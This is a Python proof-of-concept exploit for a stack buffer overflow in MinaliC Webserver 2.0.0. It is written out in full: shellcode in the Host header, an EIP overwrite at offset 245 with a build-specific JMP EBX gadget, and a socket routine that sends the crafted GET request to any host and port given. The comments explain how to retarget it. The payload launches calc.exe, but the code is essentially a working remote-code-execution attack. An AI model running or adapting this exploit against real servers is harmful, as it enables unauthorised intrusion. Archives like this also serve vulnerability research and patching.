
# Title : MinaliC Webserver 2.0.0 - Buffer Overflow
# Published : 2013-04-15
# Author :


#!/usr/bin/env python

# Exploit Title: MinaliC Webserver buffer overflow
# Date: 12 Apr 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://minalic.sourceforge.net/
# Version: MinaliC Webserver 2.0.0
# Tested on: Windows XP Pro SP2, English
#
# Description: 
# Remote code execution via a buffer overflow in the GET request path: an
# overlong path overwrites EIP at offset 245, and a JMP EBX gadget in
# ntdll.dll transfers control to the shellcode carried in the Host header
# (EBX points at that header value at crash time). The offset and the gadget
# address are specific to the tested Windows XP SP2 English build.
#

import socket
import struct
import sys

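# 74-byte calc.exe payload from http://code.google.com/p/win-exec-calc-shellcode/
# The listing had lost its backslashes ("x31xd2..."); each token is one byte.
# NOTE: the payload ends in \xcc (int3), so the target process traps right
# after calc.exe is spawned -- swap the last byte for a clean exit if the
# server must keep running.
shellcode = (
    b"\x31\xd2\x52\x68\x63\x61\x6c\x63\x89\xe6\x52\x56\x64\x8b\x72"
    b"\x30\x8b\x76\x0c\x8b\x76\x0c\xad\x8b\x30\x8b\x7e\x18\x8b\x5f"
    b"\x3c\x8b\x5c\x1f\x78\x8b\x74\x1f\x20\x01\xfe\x8b\x4c\x1f\x24"
    b"\x01\xf9\x0f\xb7\x2c\x51\x42\xad\x81\x3c\x07\x57\x69\x6e\x45"
    b"\x75\xf1\x8b\x74\x1f\x1c\x01\xfe\x03\x3c\xae\xff\xd7\xcc"
)

# EIP is overwritten at offset 245 of the request path when minalic.exe runs
# from C:\minalic\bin. The offset depends on the install path, so re-measure it
# with a cyclic pattern on any other install.
EIP_OFFSET = 245
# At the crash EBX points directly at the "Host:" header value, so the
# shellcode goes there and EIP is pointed at a JMP EBX gadget.
# JMP EBX @ 0x7C955B47 in NTDLL.DLL, Windows XP Pro SP2 English only -- the
# address is build-specific; locate one for any other ntdll (mona/findjmp).
JMP_EBX = 0x7C955B47
# Target from the original PoC; override on the command line as [host [port]].
DEFAULT_HOST = "192.168.37.132"
DEFAULT_PORT = 8080


def build_request(offset=EIP_OFFSET, ret_addr=JMP_EBX, payload=shellcode):
    """Return the raw HTTP request that overflows MinaliC and jumps to payload.

    offset:   bytes of filler before the saved return address (EIP).
    ret_addr: address written over EIP, packed little-endian (JMP EBX gadget).
    payload:  shellcode placed in the Host header, wrapped in a NOP sled.
    Returns the request as bytes; nothing is sent.
    """
    junk = b"\x41" * offset
    ret = struct.pack("<I", ret_addr)
    # NOP sled on both sides gives the JMP EBX some slack if EBX does not
    # land exactly on the start of the header value.
    host = b"\x90" * 30 + payload + b"\x90" * 31
    return (b"GET /" + junk + ret + b" HTTP/1.1\r\n"
            + b"Host: " + host + b"\r\n\r\n")


def main(argv=None):
    """Send the overflow request to the target given as [host [port]].

    With no arguments the original PoC target (192.168.37.132:8080) is used.
    """
    args = sys.argv[1:] if argv is None else argv
    target = args[0] if len(args) > 0 else DEFAULT_HOST
    port = int(args[1]) if len(args) > 1 else DEFAULT_PORT
    buf = build_request()
    print("[+] sending buffer size %d" % len(buf))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(10)  # do not hang forever on a filtered port
    try:
        s.connect((target, port))
        # sendall: send() may write only part of the ~400-byte buffer, which
        # would leave the crash unreliable.
        s.sendall(buf)
    finally:
        s.close()


if __name__ == "__main__":
    main()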